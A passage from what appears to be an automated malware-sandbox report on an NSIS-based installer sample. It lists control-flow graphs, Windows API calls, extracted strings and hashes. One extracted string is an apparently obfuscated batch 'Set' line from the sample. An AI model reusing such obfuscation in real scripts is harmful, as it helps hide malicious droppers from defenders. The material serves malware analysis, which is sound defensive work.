                                                  • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                  • EnableWindow.USER32(?,?), ref: 00405757
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                  • EnableMenuItem.USER32(00000000), ref: 00405774
                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                  • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                  • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                  • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: @rD
                                                  • API String ID: 3282139019-3814967855
                                                  • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                  • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                  • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                  • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                  APIs
                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                  • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                  • ShowWindow.USER32(?), ref: 00401753
                                                  • ShowWindow.USER32(?), ref: 00401767
                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                  • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                  Strings
                                                  • Jump: %d, xrefs: 00401602
                                                  • BringToFront, xrefs: 004016BD
                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                  • Rename failed: %s, xrefs: 0040194B
                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                  • detailprint: %s, xrefs: 00401679
                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                  • Call: %d, xrefs: 0040165A
                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                  • Aborting: "%s", xrefs: 0040161D
                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                  • Rename on reboot: %s, xrefs: 00401943
                                                  • Rename: %s, xrefs: 004018F8
                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                  • Sleep(%d), xrefs: 0040169D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                  • API String ID: 2872004960-3619442763
                                                  • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                  • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                  • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                  • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                  APIs
                                                    • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                  • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                  • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                  • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                  • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                    • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                  • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                    • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                  • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                  • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                  • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 608394941-1650083594
                                                  • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                  • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                  • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                  • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                  • lstrcatW.KERNEL32(00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401A76
                                                  • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,004CB0B0,00000000,00000000), ref: 00401AA0
                                                    • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                  • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$open
                                                  • API String ID: 4286501637-2478300759
                                                  • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                  • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                  • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                  • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403598
                                                  • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                    • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                    • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                  • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                  Strings
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                  • Inst, xrefs: 0040366C
                                                  • soft, xrefs: 00403675
                                                  • Null, xrefs: 0040367E
                                                  • Error launching installer, xrefs: 004035D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                  • API String ID: 4283519449-527102705
                                                  • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                  • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                  • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                  • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 004033E7
                                                  • GetTickCount.KERNEL32 ref: 00403464
                                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                  • wsprintfW.USER32 ref: 004034A4
                                                  • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                  • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                  Strings
                                                  • ... %d%%, xrefs: 0040349E
                                                  • Set Adidas=TyUeNegotiations-Chip-Fathers-Case-Dollars-Penalties-mxrGRochester-Vice-Assign-J-Su-Minus-Dream-ZlseMate-Taxi-Waves-Sam-Parliament-Exec-Defense-Shades-Debut-xWnInfinite-Ft-Increasing-N-Harrison-Finding-Apache-Varies-hgLouisiana-Orange-Bedf, xrefs: 004033A9
                                                  • X1C, xrefs: 004033ED
                                                  • X1C, xrefs: 0040343C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719171770.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_cW5i0RdQ4L.jbxd
                                                  Similarity
                                                  • API ID: CountFileTickWrite$wsprintf
                                                  • String ID: ... %d%%$Set Adidas=TyUeNegotiations-Chip-Fathers-Case-Dollars-Penalties-mxrGRochester-Vice-Assign-J-Su-Minus-Dream-ZlseMate-Taxi-Waves-Sam-Parliament-Exec-Defense-Shades-Debut-xWnInfinite-Ft-Increasing-N-Harrison-Finding-Apache-Varies-hgLouisiana-Orange-Bedf$X1C$X1C
                                                  • API String ID: 651206458-2328794914
                                                  • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                  • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                  • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                  • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                  APIs
                                                  • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                  • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                  • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                  • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                    • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1719065988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1719052423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719087990.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1719104537.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
